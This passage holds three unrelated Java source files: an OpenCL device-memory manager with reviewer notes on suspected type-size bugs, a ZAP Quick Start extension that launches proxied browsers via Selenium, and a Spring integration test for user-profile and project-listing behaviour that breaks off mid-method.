 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package es.bsc.opencl.wrapper;

import java.lang.reflect.Array;
import java.util.HashMap;
import java.util.concurrent.LinkedBlockingQueue;
import org.jocl.CL;
import org.jocl.Pointer;
import org.jocl.Sizeof;
import org.jocl.cl_command_queue;
import org.jocl.cl_context;
import org.jocl.cl_event;
import org.jocl.cl_mem;

/**
 * Tracks allocations on an OpenCL device: keeps a registry of buffers keyed by
 * data id, accounts free memory, and queues requests that do not currently fit.
 * Eviction policy is delegated to subclasses via {@link #releaseRegister}.
 * NOTE(review): this class is not synchronized; it appears to assume a single
 * caller thread — confirm against the callers.
 */
public abstract class DeviceMemory {

    private final cl_context context;
    private final cl_command_queue queue;
    // Remaining device memory in bytes; decremented/incremented as registers
    // are created and destroyed.
    private long memoryFree;
    // Registry of live device buffers, keyed by data id.
    private final HashMap<String, MemoryRegister> inMemoryValues = new HashMap<>();
    // Requests deferred because the device had no space; presumably drained by
    // code outside this view — TODO confirm, nothing here consumes it.
    private final LinkedBlockingQueue<MemoryRequest> requestQueue = new LinkedBlockingQueue<>();

    public DeviceMemory(long memoryFree, cl_context context, cl_command_queue queue) {
        this.memoryFree = memoryFree;
        this.context = context;
        this.queue = queue;
    }

    /**
     * Ensures {@code object} is resident on the device under {@code dataId}.
     * Creates (and optionally uploads) a new register when absent, evicting
     * other registers if needed; defers the request when space cannot be
     * freed.  Calls {@code listener.completed(register)} on success.
     */
    public void setOnMemory(Device.OpenCLMemoryPrepare listener, String dataId, Object object,
            Class<?> objectClass, int size, boolean isRead, boolean canWrite) {
        MemoryRegister register = inMemoryValues.get(dataId);
        if (register == null) {
            int byteSize = baseSize(objectClass) * size;
            if (memoryFree < byteSize) {
                if (!releaseMemory(byteSize)) {
                    MemoryRequest mr = new MemoryRequest(listener, dataId, object, objectClass,
                            size, isRead, canWrite);
                    requestQueue.add(mr);
                    //Operation will be performed when there's space enough
                    return;
                }
            }
            register = createRegister(dataId, byteSize, canWrite);
            // Only upload the host value when the kernel will read it.
            if (isRead) {
                register.writeValue(objectClass, size, object);
            }
            inMemoryValues.put(dataId, register);
            memoryFree -= register.getSize();
        }
        pendingAccess(register);
        listener.completed(register);
    }

    /** Replaces the event that guards reads of this register's buffer. */
    public void replaceCreatorEvent(Object parValue, cl_event overridingEvent) {
        MemoryRegister register = (MemoryRegister) parValue;
        register.replaceLoadingEvent(overridingEvent);
    }

    /**
     * Copies the device value back into {@code target} when it was written by
     * a kernel, then marks the access as performed.  The element count is
     * recomputed by walking the (possibly nested) array dimensions of target.
     */
    public void retrieveValue(Object parValue, Object target, boolean wasWritten) {
        MemoryRegister register = (MemoryRegister) parValue;
        if (wasWritten) {
            int size = 1;
            Class<?> targetClass = target.getClass();
            Object sizeObject = target;
            while (targetClass.isArray()) {
                // NOTE(review): assumes a rectangular array — the length of
                // element 0 is taken for every sibling. TODO confirm.
                size *= Array.getLength(sizeObject);
                sizeObject = Array.get(sizeObject, 0);
                targetClass = targetClass.getComponentType();
            }
            register.retrieveValue(target, targetClass, size);
        }
        performedAccess(register);
    }

    // Subclass hooks: buffer creation, access bookkeeping, and eviction.
    protected abstract MemoryRegister createRegister(String dataId, int size, boolean canWrite);

    protected abstract void pendingAccess(MemoryRegister reg);

    protected abstract void performedAccess(MemoryRegister reg);

    /**
     * Evicts registers (chosen by the subclass) until {@code space} bytes are
     * available.  Returns false when the subclass has nothing left to evict.
     */
    private boolean releaseMemory(long space) {
        MemoryRegister register;
        while (space - memoryFree > 0) {
            register = this.releaseRegister(space - memoryFree);
            if (register == null) {
                return false;
            }
            inMemoryValues.remove(register.getDataId());
            memoryFree += register.getSize();
            register.destroy();
        }
        return true;
    }

    protected abstract MemoryRegister releaseRegister(long missingSpace);

    /** Immutable record of a deferred setOnMemory call. */
    private static class MemoryRequest {

        private final Device.OpenCLMemoryPrepare listener;
        private final String valueRenaming;
        private final Object object;
        private final Class<?> objectClass;
        private final int size;
        private final boolean copyInput;
        private final boolean canWrite;

        public MemoryRequest(Device.OpenCLMemoryPrepare listener, String valueRenaming,
                Object object, Class<?> objectClass, int size, boolean copyInput,
                boolean canWrite) {
            this.listener = listener;
            this.valueRenaming = valueRenaming;
            this.object = object;
            this.objectClass = objectClass;
            this.size = size;
            this.copyInput = copyInput;
            this.canWrite = canWrite;
        }

        public Device.OpenCLMemoryPrepare getListener() {
            return listener;
        }

        public Object getObject() {
            return object;
        }

        public Class<?> getObjectClass() {
            return objectClass;
        }

        public int getSize() {
            return size;
        }

        public String getValueRenaming() {
            return valueRenaming;
        }

        public boolean isCanWrite() {
            return canWrite;
        }

        public boolean isCopyInput() {
            return copyInput;
        }
    }

    /**
     * A device buffer together with the event that must complete before the
     * buffer's contents are valid to read.
     */
    public abstract class MemoryRegister {

        private final cl_mem data;
        private final long size;
        // Previous loading event, retained so it can be released on destroy().
        private cl_event firstLoadingEvent;
        // Event that guards the current contents of the buffer.
        private cl_event loadingEvent;
        private final String dataId;

        public MemoryRegister(String dataId, int size, boolean canWrite) {
            this.size = size;
            int[] errCode = new int[1];
            // NOTE(review): errCode is captured but never checked — a failed
            // clCreateBuffer would go unnoticed here.
            this.data = CL.clCreateBuffer(context,
                    canWrite ? CL.CL_MEM_READ_WRITE : CL.CL_MEM_READ_ONLY, size, null, errCode);
            this.dataId = dataId;
        }

        public final String getDataId() {
            return dataId;
        }

        public final long getSize() {
            return size;
        }

        public final cl_mem getBuffer() {
            return data;
        }

        /**
         * Asynchronously uploads {@code object} (flattened if it is a nested
         * array) into the device buffer and records the write event.
         */
        public final void writeValue(Class<?> objectClass, int size, Object object) {
            int[] errout = new int[1];
            Object seq;
            if (object.getClass().getComponentType().isArray()) {
                // Nested array: copy into a flat, contiguous sequence first.
                seq = Array.newInstance(objectClass, size);
                flatten(object, seq, 0);
            } else {
                seq = object;
            }
            cl_event event = new cl_event();
            if (objectClass == boolean.class) {
                // NOTE(review): casting a boolean[] to char[] should throw
                // ClassCastException at runtime — this branch looks broken;
                // confirm whether boolean data ever reaches it.
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_char * size,
                        Pointer.to((char[]) seq), 0, null, event);
            }
            if (objectClass == byte.class) {
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_char * size,
                        Pointer.to((byte[]) seq), 0, null, event);
            }
            if (objectClass == char.class) {
                // NOTE(review): uses cl_short here but baseSize() sizes char
                // as cl_char — the allocation and the transfer disagree;
                // verify which is intended.
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_short * size,
                        Pointer.to((char[]) seq), 0, null, event);
            }
            if (objectClass == short.class) {
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_short * size,
                        Pointer.to((short[]) seq), 0, null, event);
            }
            if (objectClass == int.class) {
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_int * size,
                        Pointer.to((int[]) seq), 0, null, event);
            }
            if (objectClass == long.class) {
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_long * size,
                        Pointer.to((long[]) seq), 0, null, event);
            }
            if (objectClass == float.class) {
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_float * size,
                        Pointer.to((float[]) seq), 0, null, event);
            }
            if (objectClass == double.class) {
                CL.clEnqueueWriteBuffer(queue, data, CL.CL_FALSE, 0, Sizeof.cl_double * size,
                        Pointer.to((double[]) seq), 0, null, event);
            }
            setLoadingEvent(event);
            CL.clFlush(queue);
        }

        public final void replaceLoadingEvent(cl_event overridingEvent) {
            // Keep the old event so destroy() can release it later.
            this.firstLoadingEvent = this.loadingEvent;
            this.loadingEvent = overridingEvent;
        }

        /**
         * Blocking download of the buffer into {@code target}, waiting on the
         * loading event; nested target arrays are filled via expand().
         */
        public final void retrieveValue(Object target, Class<?> targetClass, int size) {
            CL.clFlush(queue);
            Object flatResult;
            if (target.getClass().getComponentType().isArray()) {
                flatResult = Array.newInstance(targetClass, size);
            } else {
                flatResult = target;
            }
            if (targetClass == boolean.class) {
                // NOTE(review): same boolean[] -> char[] cast problem as in
                // writeValue — likely ClassCastException; confirm.
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_char,
                        Pointer.to((char[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            if (targetClass == byte.class) {
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_char,
                        Pointer.to((byte[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            if (targetClass == char.class) {
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_short,
                        Pointer.to((char[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            if (targetClass == short.class) {
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_short,
                        Pointer.to((short[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            if (targetClass == int.class) {
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_int,
                        Pointer.to((int[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            if (targetClass == long.class) {
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_long,
                        Pointer.to((long[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            if (targetClass == float.class) {
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_float,
                        Pointer.to((float[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            if (targetClass == double.class) {
                CL.clEnqueueReadBuffer(queue, data, CL.CL_TRUE, 0, size * Sizeof.cl_double,
                        Pointer.to((double[]) flatResult), 1, new cl_event[]{loadingEvent}, null);
            }
            CL.clFlush(queue);
            if (target.getClass().getComponentType().isArray()) {
                // Copy the flat buffer back out into the nested target shape.
                expand(flatResult, target, 0);
            }
        }

        public final cl_event getLoadingEvent() {
            return loadingEvent;
        }

        public final void setLoadingEvent(cl_event event) {
            this.loadingEvent = event;
        }

        /** Releases both events (when present) and the device buffer. */
        public final void destroy() {
            if (firstLoadingEvent != null) {
                CL.clReleaseEvent(firstLoadingEvent);
            }
            CL.clReleaseEvent(loadingEvent);
            CL.clReleaseMemObject(data);
        }

        @Override
        public String toString() {
            return "Data " + dataId + " (" + data + ") created by " + loadingEvent
                    + " fills " + size + " bytes ";
        }
    }

    /**
     * Byte width of one element of the given primitive class on the device.
     * Non-primitive classes fall through to POINTER size.
     */
    private static int baseSize(Class aClass) {
        if (aClass == boolean.class) {
            return Sizeof.cl_char;
        }
        if (aClass == byte.class) {
            return Sizeof.cl_char;
        }
        if (aClass == char.class) {
            // NOTE(review): writeValue/retrieveValue transfer char data as
            // cl_short — this cl_char sizing under-allocates by half; confirm.
            return Sizeof.cl_char;
        }
        if (aClass == short.class) {
            return Sizeof.cl_short;
        }
        if (aClass == int.class) {
            return Sizeof.cl_int;
        }
        if (aClass == long.class) {
            return Sizeof.cl_long;
        }
        if (aClass == float.class) {
            return Sizeof.cl_float;
        }
        if (aClass == double.class) {
            return Sizeof.cl_double;
        }
        return Sizeof.POINTER;
    }

    /**
     * Recursively copies elements of the flat sequence {@code seq}, starting
     * at {@code offset}, into the (possibly nested) array {@code o}.
     * Returns the number of elements consumed.
     */
    private static int expand(Object seq, Object o, int offset) {
        int read;
        Class<?> oClass = o.getClass();
        if (oClass.isArray()) {
            if (oClass.getComponentType().isArray()) {
                read = 0;
                for (int componentId = 0; componentId < Array.getLength(o); componentId++) {
                    read += expand(seq, Array.get(o, componentId), offset + read);
                }
            } else {
                System.arraycopy(seq, offset, o, 0, Array.getLength(o));
                read = Array.getLength(o);
            }
        } else {
            Array.set(o, offset, seq);
            read = 1;
        }
        return read;
    }

    /**
     * Recursively copies the (possibly nested) array {@code o} into the flat
     * sequence {@code seq} starting at {@code offset}.  Returns the number of
     * elements written.  Inverse of {@link #expand}.
     */
    private static int flatten(Object o, Object seq, int offset) {
        int written;
        Class<?> oClass = o.getClass();
        if (oClass.isArray()) {
            if (oClass.getComponentType().isArray()) {
                written = 0;
                for (int componentId = 0; componentId < Array.getLength(o); componentId++) {
                    written += flatten(Array.get(o, componentId), seq, offset + written);
                }
            } else {
                System.arraycopy(o, 0, seq, offset, Array.getLength(o));
                written = Array.getLength(o);
            }
        } else {
            Array.set(seq, offset, o);
            written = 1;
        }
        return written;
    }
}
/*
 * Zed Attack Proxy (ZAP) and its related class files.
 *
 * ZAP is an HTTP/HTTPS proxy for assessing web application security.
 *
 * Copyright 2017 The ZAP Development Team
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.zaproxy.zap.extension.quickstart.launch;

import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import javax.swing.ImageIcon;
import javax.swing.JButton;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.openqa.selenium.WebDriver;
import org.parosproxy.paros.Constant;
import org.parosproxy.paros.control.Control;
import org.parosproxy.paros.extension.Extension;
import org.parosproxy.paros.extension.ExtensionAdaptor;
import org.parosproxy.paros.extension.ExtensionHook;
import org.parosproxy.paros.extension.OptionsChangedListener;
import org.parosproxy.paros.model.OptionsParam;
import org.parosproxy.paros.view.View;
import org.zaproxy.zap.control.AddOn;
import org.zaproxy.zap.extension.AddOnInstallationStatusListener;
import org.zaproxy.zap.extension.api.API;
import org.zaproxy.zap.extension.quickstart.ExtensionQuickStart;
import org.zaproxy.zap.extension.quickstart.QuickStartParam;
import org.zaproxy.zap.extension.selenium.ExtensionSelenium;
import org.zaproxy.zap.utils.DisplayUtils;

/**
 * Quick Start add-on extension that lets the user launch a proxied browser
 * (via Selenium) from a toolbar button or the launch panel, remembering the
 * last successfully launched browser in the Quick Start options.
 */
public class ExtensionQuickStartLaunch extends ExtensionAdaptor
        implements AddOnInstallationStatusListener, OptionsChangedListener {

    // Placeholder shown in the URL field; treated the same as an empty URL.
    private static final String DEFAULT_VALUE_URL_FIELD = "http://";

    public static final String NAME = "ExtensionQuickStartLaunch";

    private static final Logger LOGGER = LogManager.getLogger(ExtensionQuickStartLaunch.class);

    public static final String RESOURCES = "/org/zaproxy/zap/extension/quickstart/resources";

    // Toolbar icons, scaled for the current display; one per supported browser.
    private static final ImageIcon CHROME_ICON =
            DisplayUtils.getScaledIcon(
                    new ImageIcon(
                            ExtensionQuickStart.class.getResource(RESOURCES + "/chrome.png")));
    private static final ImageIcon CHROMIUM_ICON =
            DisplayUtils.getScaledIcon(
                    new ImageIcon(
                            ExtensionQuickStart.class.getResource(RESOURCES + "/chromium.png")));
    private static final ImageIcon FIREFOX_ICON =
            DisplayUtils.getScaledIcon(
                    new ImageIcon(
                            ExtensionQuickStart.class.getResource(RESOURCES + "/firefox.png")));
    private static final ImageIcon SAFARI_ICON =
            DisplayUtils.getScaledIcon(
                    new ImageIcon(
                            ExtensionQuickStart.class.getResource(RESOURCES + "/safari.png")));

    private OptionsQuickStartLaunchPanel optionsPanel;
    private LaunchPanel launchPanel;
    private JButton launchToolbarButton;

    private static final List<Class<? extends Extension>> DEPENDENCIES;

    static {
        List<Class<? extends Extension>> dependencies = new ArrayList<>(2);
        dependencies.add(ExtensionQuickStart.class);
        dependencies.add(ExtensionSelenium.class);
        DEPENDENCIES = Collections.unmodifiableList(dependencies);
    }

    public ExtensionQuickStartLaunch() {
        super(NAME);
    }

    @Override
    public boolean supportsDb(String type) {
        return true;
    }

    @Override
    public void hook(ExtensionHook extensionHook) {
        super.hook(extensionHook);

        extensionHook.addApiImplementor(new QuickStartLaunchAPI(this));
        extensionHook.addAddOnInstallationStatusListener(this);
        extensionHook.addOptionsChangedListener(this);

        // UI wiring only happens in desktop mode (getView() is null headless).
        if (getView() != null) {
            extensionHook.getHookView().addMainToolBarComponent(getLaunchToolbarButton());
            extensionHook.getHookView().addOptionPanel(getOptionsPanel());
            this.launchPanel =
                    new LaunchPanel(
                            this,
                            this.getExtQuickStart(),
                            this.getExtQuickStart().getQuickStartPanel());
            this.getExtQuickStart().setLaunchPanel(this.launchPanel);
        }
    }

    @Override
    public boolean canUnload() {
        return true;
    }

    @Override
    public void unload() {
        if (getView() != null) {
            this.getExtQuickStart().setLaunchPanel(null);
        }
    }

    @Override
    public void postInit() {
        if (this.launchPanel != null) {
            this.launchPanel.postInit();
        }
    }

    @Override
    public void optionsLoaded() {
        super.optionsLoaded();
        if (View.isInitialised()) {
            // Restore the icon of the browser that was last launched.
            setToolbarButtonIcon(
                    this.getExtQuickStart().getQuickStartParam().getLaunchDefaultBrowser());
            if (this.launchPanel != null) {
                this.launchPanel.optionsChanged();
            }
        }
    }

    @Override
    public void optionsChanged(OptionsParam optionsParam) {
        if (this.launchPanel != null) {
            this.launchPanel.optionsChanged();
        }
    }

    private OptionsQuickStartLaunchPanel getOptionsPanel() {
        // Lazily created; hook() is the only caller in this file.
        if (optionsPanel == null) {
            optionsPanel = new OptionsQuickStartLaunchPanel();
        }
        return optionsPanel;
    }

    private JButton getLaunchToolbarButton() {
        if (launchToolbarButton == null) {
            launchToolbarButton = new JButton();
            launchToolbarButton.setToolTipText(
                    Constant.messages.getString("quickstart.toolbar.button.tooltip.launch"));
            launchToolbarButton.addActionListener(
                    e ->
                            launchBrowser(
                                    launchPanel.getSelectedBrowser(), launchPanel.getUrlValue()));
        }
        return launchToolbarButton;
    }

    /** Swaps the toolbar icon to match the named browser; chromium is the fallback. */
    protected void setToolbarButtonIcon(String browser) {
        if ("firefox".equalsIgnoreCase(browser)) {
            launchToolbarButton.setIcon(FIREFOX_ICON);
        } else if ("chrome".equalsIgnoreCase(browser)) {
            launchToolbarButton.setIcon(CHROME_ICON);
        } else if ("safari".equalsIgnoreCase(browser)) {
            launchToolbarButton.setIcon(SAFARI_ICON);
        } else {
            launchToolbarButton.setIcon(CHROMIUM_ICON);
        }
    }

    @Override
    public List<Class<? extends Extension>> getDependencies() {
        return DEPENDENCIES;
    }

    @Override
    public String getDescription() {
        return Constant.messages.getString("quickstart.launch.desc");
    }

    private ExtensionQuickStart getExtQuickStart() {
        return Control.getSingleton().getExtensionLoader().getExtension(ExtensionQuickStart.class);
    }

    public ExtensionSelenium getExtSelenium() {
        return Control.getSingleton().getExtensionLoader().getExtension(ExtensionSelenium.class);
    }

    /**
     * Launches the named proxied browser on a background thread and navigates
     * it to {@code url} (or the configured/ZAP start page when blank).  On
     * success the browser name is persisted as the new default; on failure a
     * warning dialog is shown and the error logged.
     */
    protected void launchBrowser(String browserName, String url) {
        new Thread(
                        () -> {
                            try {
                                WebDriver wd =
                                        getExtSelenium().getProxiedBrowserByName(browserName);
                                if (wd != null) {
                                    QuickStartParam params =
                                            getExtQuickStart().getQuickStartParam();
                                    if (url != null
                                            && url.length() > 0
                                            && !url.equals(DEFAULT_VALUE_URL_FIELD)) {
                                        wd.get(url);
                                    } else if (params.isLaunchZapStartPage()) {
                                        wd.get(
                                                API.getInstance()
                                                        .getBaseURL(
                                                                API.Format.OTHER,
                                                                QuickStartLaunchAPI.API_PREFIX,
                                                                API.RequestType.other,
                                                                QuickStartLaunchAPI
                                                                        .OTHER_START_PAGE,
                                                                true));
                                    } else if (!params.isLaunchBlankStartPage()) {
                                        wd.get(params.getLaunchStartPage());
                                    }
                                    // Use the same browser next time, as long
                                    // as it worked
                                    params.setLaunchDefaultBrowser(browserName);
                                    params.getConfig().save();
                                }
                            } catch (Exception e1) {
                                ExtensionSelenium extSel = getExtSelenium();
                                View.getSingleton()
                                        .showWarningDialog(
                                                extSel.getWarnMessageFailedToStart(
                                                        browserName, e1));
                                LOGGER.error(e1.getMessage(), e1);
                            }
                        },
                        "ZAP-BrowserLauncher")
                .start();
    }

    public String getDefaultLaunchContent() {
        // This is no longer read from a link
        return Constant.messages.getString("quickstart.launch.html");
    }

    @Override
    public void addOnInstalled(AddOn addOn) {
        // Not currently supported
    }

    @Override
    public void addOnSoftUninstalled(AddOn addOn, boolean successfully) {}

    @Override
    public void addOnUninstalled(AddOn addOn, boolean successfully) {
        // Only the HUD add-on affects the launch panel; id is hard-coded.
        if (getView() != null && addOn.getId().equals("hud")) {
            this.launchPanel.hudAddOnUninstalled();
        }
    }
}
package org.sagebionetworks.repo.manager;

import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertNotNull;
import static org.junit.Assert.assertTrue;

import java.util.ArrayList;
import java.util.Collections;
import java.util.LinkedList;
import java.util.List;

import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.sagebionetworks.repo.model.ACCESS_TYPE;
import org.sagebionetworks.repo.model.AccessControlList;
import org.sagebionetworks.repo.model.AuthorizationConstants;
import org.sagebionetworks.repo.model.DatastoreException;
import org.sagebionetworks.repo.model.NextPageToken;
import org.sagebionetworks.repo.model.Project;
import org.sagebionetworks.repo.model.ProjectHeader;
import org.sagebionetworks.repo.model.ProjectHeaderList;
import org.sagebionetworks.repo.model.ProjectListSortColumn;
import org.sagebionetworks.repo.model.ProjectListType;
import org.sagebionetworks.repo.model.ResourceAccess;
import org.sagebionetworks.repo.model.UnauthorizedException;
import org.sagebionetworks.repo.model.UserInfo;
import org.sagebionetworks.repo.model.UserProfile;
import org.sagebionetworks.repo.model.UserProfileDAO;
import org.sagebionetworks.repo.model.auth.NewUser;
import org.sagebionetworks.repo.model.entity.query.SortDirection;
import org.sagebionetworks.repo.model.message.Settings;
import org.sagebionetworks.repo.web.NotFoundException;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.test.context.ContextConfiguration;
import org.springframework.test.context.junit4.SpringJUnit4ClassRunner;

import com.google.common.collect.Sets;

/**
 * Integration tests for {@code UserProfileManager}: profile CRUD, email-change
 * suppression (PLFM-2504), profile-image URL lookup, and project-listing
 * visibility rules (PLFM-4554). Runs against the real Spring test context.
 */
@RunWith(SpringJUnit4ClassRunner.class)
@ContextConfiguration(locations = { "classpath:test-context.xml" })
public class UserProfileManagerImplTest {

	@Autowired
	private UserManager userManager;
	@Autowired
	private UserProfileDAO userProfileDAO;
	@Autowired
	private UserProfileManager userProfileManager;
	@Autowired
	private EntityManager entityManager;
	@Autowired
	private EntityAclManager entityAclManager;

	private static final String USER_NAME = "foobar";
	private static final String USER_EMAIL = "foo@bar.com";

	// Principal ids of the two users created in setUp().
	private Long userId;
	private Long userIdTwo;

	UserInfo admin;
	UserInfo userInfo;
	UserInfo userInfoTwo;
	UserInfo anonymous;

	// Cleanup lists; torn down in tearDown() (projects in reverse creation order).
	List<String> projectsToDelete;
	List<Long> usersToDelete;

	/**
	 * Creates two fresh users ("foobar" and "doubleohhseven") and resolves the
	 * bootstrap admin and anonymous principals.
	 */
	@Before
	public void setUp() throws Exception {
		admin = userManager.getUserInfo(AuthorizationConstants.BOOTSTRAP_PRINCIPAL.THE_ADMIN_USER.getPrincipalId());
		anonymous = userManager.getUserInfo(AuthorizationConstants.BOOTSTRAP_PRINCIPAL.ANONYMOUS_USER.getPrincipalId());
		usersToDelete = new LinkedList<>();
		projectsToDelete = new LinkedList<>();
		NewUser user = new NewUser();
		user.setEmail(USER_EMAIL);
		user.setFirstName("Foo");
		user.setLastName("Bar");
		user.setUserName(USER_NAME);
		userId = userManager.createUser(user);
		userInfo = userManager.getUserInfo(userId);
		userInfo.setAcceptsTermsOfUse(true);
		usersToDelete.add(userId);
		user = new NewUser();
		user.setEmail("doubleohhseven@gmail.com");
		user.setFirstName("James");
		user.setLastName("Bond");
		user.setUserName("doubleohhseven");
		userIdTwo = userManager.createUser(user);
		userInfoTwo = userManager.getUserInfo(userIdTwo);
		usersToDelete.add(userIdTwo);
	}

	/** Deletes created projects (newest first) and then the created users. */
	@After
	public void tearDown() throws Exception {
		Collections.reverse(projectsToDelete);
		for (String entityId : projectsToDelete) {
			entityManager.deleteEntity(admin, entityId);
		}
		for (Long userId : usersToDelete) {
			userManager.deletePrincipal(admin, userId);
		}
	}

	/** Create / read / update round-trip for a user profile. */
	@Test
	public void testCRU() throws DatastoreException, UnauthorizedException, NotFoundException {
		// delete the existing user profile so we can create our own
		userProfileDAO.delete(userId.toString());
		// Create a new UserProfile
		Long principalId = Long.parseLong(this.userId.toString());
		UserProfile created;
		{
			UserProfile profile = new UserProfile();
			profile.setCompany("Spies 'R' Us");
			profile.setFirstName("James");
			profile.setLastName("Bond");
			profile.setOwnerId(this.userId.toString());
			profile.setUserName(USER_NAME);
			Settings settings = new Settings();
			settings.setSendEmailNotifications(true);
			profile.setNotificationSettings(settings);
			// Create the profile
			created = this.userProfileManager.createUserProfile(profile);
			// the changed fields are etag and emails (which are ignored)
			// set these fields in 'profile' so we can compare to 'created'
			profile.setEmails(Collections.singletonList(USER_EMAIL));
			profile.setOpenIds(new ArrayList<String>());
			profile.setUserName(USER_NAME);
			profile.setEtag(created.getEtag());
			profile.setCreatedOn(created.getCreatedOn());
			assertEquals(profile, created);
		}
		assertNotNull(created);
		assertNotNull(created.getEtag());

		// Local UserInfo deliberately shadows the field: a minimal non-admin identity.
		UserInfo userInfo = new UserInfo(false, principalId);
		// Get it back
		UserProfile clone = userProfileManager.getUserProfile(principalId.toString());
		assertEquals(created, clone);

		// Make sure we can update it
		created.setUserName("newUsername");
		String startEtag = created.getEtag();
		// Changing emails is currently disabled; email changes are ignored (see PLFM-2486 note below).
		UserProfile updated = userProfileManager.updateUserProfile(userInfo, created);
		assertFalse("Update failed to update the etag", startEtag.equals(updated.getEtag()));
		// Get it back
		clone = userProfileManager.getUserProfile(principalId.toString());
		assertEquals(updated, clone);
		assertEquals("newUsername", clone.getUserName());
	}

	// Note: In PLFM-2486 we allow the client to change the emails passed in, we
	// just ignore them
	/** Emails supplied on create/update are ignored; the account email wins. */
	@Test
	public void testPLFM_2504() throws DatastoreException, UnauthorizedException, NotFoundException {
		// delete the existing user profile so we can create our own
		userProfileDAO.delete(userId.toString());
		// Create a new UserProfile
		Long principalId = Long.parseLong(this.userId.toString());
		UserProfile profile = new UserProfile();
		profile.setCompany("Spies 'R' Us");
		profile.setEmails(new LinkedList<String>());
		profile.getEmails().add("jamesBond@spies.org");
		profile.setUserName("007");
		profile.setOwnerId(this.userId.toString());
		// Create the profile
		profile = this.userProfileManager.createUserProfile(profile);
		assertNotNull(profile);
		assertNotNull(profile.getUserName());
		assertNotNull(profile.getEtag());

		UserInfo userInfo = new UserInfo(false, principalId);
		// Get it back
		UserProfile clone = userProfileManager.getUserProfile(principalId.toString());
		assertEquals(profile, clone);
		// The bogus email passed on create was ignored in favour of the account email.
		assertEquals(Collections.singletonList(USER_EMAIL), clone.getEmails());
		// try to update it
		profile.getEmails().clear();
		profile.getEmails().add("myNewEmail@spies.org");
		String startEtag = profile.getEtag();
		// update
		// OK to change emails, as any changes to email are ignored
		profile = userProfileManager.updateUserProfile(userInfo, profile);
		assertEquals(Collections.singletonList(USER_EMAIL), profile.getEmails());
	}

	/** Requesting the profile image URL for a user without one must throw NotFoundException. */
	@Test(expected = NotFoundException.class)
	public void testGetPicturePresignedUrlNotFound() throws Exception {
		String userIdString = "" + userId;
		// get the presigned url for this handle
		assertNotNull(userProfileManager.getUserProfileImageUrl(userInfo, userIdString));
	}

	/**
	 * Public projects only appear in a user's listing when explicitly shared with
	 * them, and anonymous callers can see such public, explicitly-shared projects.
	 */
	@Test
	public void testPLFM_4554() throws Exception {
		// User one creates a project
		Project userOnesProject = createProject("userOneProject", userInfo);
		// Share the project with public
		grantReadAcess(
				AuthorizationConstants.BOOTSTRAP_PRINCIPAL.PUBLIC_GROUP.getPrincipalId(),
				userOnesProject.getId());
		// Public projects should not appear on user two's list.
		List<ProjectHeader> headers = getProjects(userInfoTwo, userInfoTwo);
		assertNotNull(headers);
		assertTrue(headers.isEmpty());
		// Grant user two read access to the project.
		grantReadAcess(userIdTwo, userOnesProject.getId());
		// User two should now have one project.
		headers = getProjects(userInfoTwo, userInfoTwo);
		assertNotNull(headers);
		assertEquals(1, headers.size());
		// call under test
		headers = getProjects(anonymous, userInfoTwo);
		assertNotNull(headers);
		assertEquals(1, headers.size());
		/*
		 * Anonymous should be able to see the public project explicitly shared with
		 * user two.
		 */
		assertEquals(userOnesProject.getId(), headers.get(0).getId());
	}

	/**
	 * Lists the projects of {@code lookingAt} as seen by {@code caller}, using
	 * fixed paging (first page), ALL types, sorted by name ascending.
	 *
	 * @param caller the user making the request
	 * @param lookingAt the user whose projects are listed
	 * @return the first page of project headers, or null when the manager returns null
	 */
	private List<ProjectHeader> getProjects(UserInfo caller, UserInfo lookingAt) {
		Long teamId = null;
		ProjectListType type = ProjectListType.ALL;
		ProjectListSortColumn sortColumn = ProjectListSortColumn.PROJECT_NAME;
		SortDirection sortDirection = SortDirection.ASC;
		ProjectHeaderList paginated = userProfileManager.getProjects(caller, lookingAt, teamId, type, sortColumn,
